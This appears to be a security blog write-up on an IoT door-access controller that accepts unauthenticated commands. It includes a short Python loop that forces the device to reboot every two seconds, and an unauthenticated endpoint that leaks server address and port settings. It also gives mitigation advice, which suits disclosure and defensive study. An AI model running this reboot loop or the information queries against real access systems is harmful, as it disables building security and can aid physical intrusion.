Insecure IoT Devices Controlling Physical Security.

Insecure IoT Devices Controlling Physical Security.
Photo by Alexandre Debiève / Unsplash

I know, this topic has been hammered on by many people.


 IoT security, you hear about it constantly, yet there are still so many insecure devices. I'm writing yet another article about another device that is lacking proper security that could allow an attacker to manipulate the device.

The IoT device I will be discussing in this article is a controller for a physical access control system, it is a PoE device that acts as the main control unit for a door, it controls the weigand reader and electronic lock on the door. It communicates with a central server program that can be hosted on site or used with a cloud service.

I wont be covering the basic, obvious ways to access the device. This article goes off the idea that the default credentials have been changed in the device.  The method I am discussing will work even if you do not know the devices credentials to login to it locally.


Attacking the Device.

This particular device allows you to reboot it without needing to enter credentials. It allows you to send a simple HTTP GET request to initiate the reboot.

I wont be showing the full url as it gives away the device model number.

Simply sending "http://<DEVICEIP>/<MODEL>/reboot" and the device reboots. With this I can create a simple python script to put the device into a reboot loop.

import requests
import time

i = 0
while i < 100:
    con_reboot = 'http://<deviceip>/<model>/reboot'
    get_reboot = requests.get(con_reboot)
    print(get_reboot.json())
    time.sleep(2)

This simple script causes the device to reboot every 2 seconds and prints the response from the device:

"{'result': True, 'cmd': 'REBOOT'}".

Aside from being able to reboot the device, I am also able to retrieve some information from it. If I replace "/reboot" with "/getoutbound" it returns

{"result":true, "cmd":"GETOUTBOUND", "body":{"siteKey":"", "primaryHostAddress":"", "primaryPort":18800, "secondaryHostAddress":"", "secondaryPort":18800, "primarySsl":1, "secondarySsl":1, "retryInterval":0, "maxRandomRetryInterval":600, "enabled":1, "sslCertVerification":0}}

Depending on the configuration of the device you may get the servers ip address in the "primaryHostAddress" field. It also shows the port the device is using to communicate with the server.


Impact

What kind of damage can this cause?

At a minimum an attacker can disable your access control system, causing you to be locked out of the building. Depending on the configuration of the device an attacker may also be able to cause the door to unlock and gain entry.

Continuously rebooting the device may also cause damage to the unit, costing your company money to repair or replace the device.

Being able to retrieve information from the device such as the ip address of the server it’s communicating with as well as the port it’s using gives an attacker more information to use against you.

The device responding to unauthenticated commands to get the information also may mean that there are more commands that can be used to gather information or even possibly take control of the device on the network.


Conclusion

If you find that a device like this is being used on your network and there is no patch to fix it or option replace it,  you will want to take steps to limit any kind of access to it. Make sure these kinds of devices are placed in a network separate from your main network and enable as many security measures you can to prevent access to them.

Manufactures of IoT devices, especially ones marketed for security, really need to step up their quality. No device should be able to be rebooted without authorization, or give up information about the network they are on.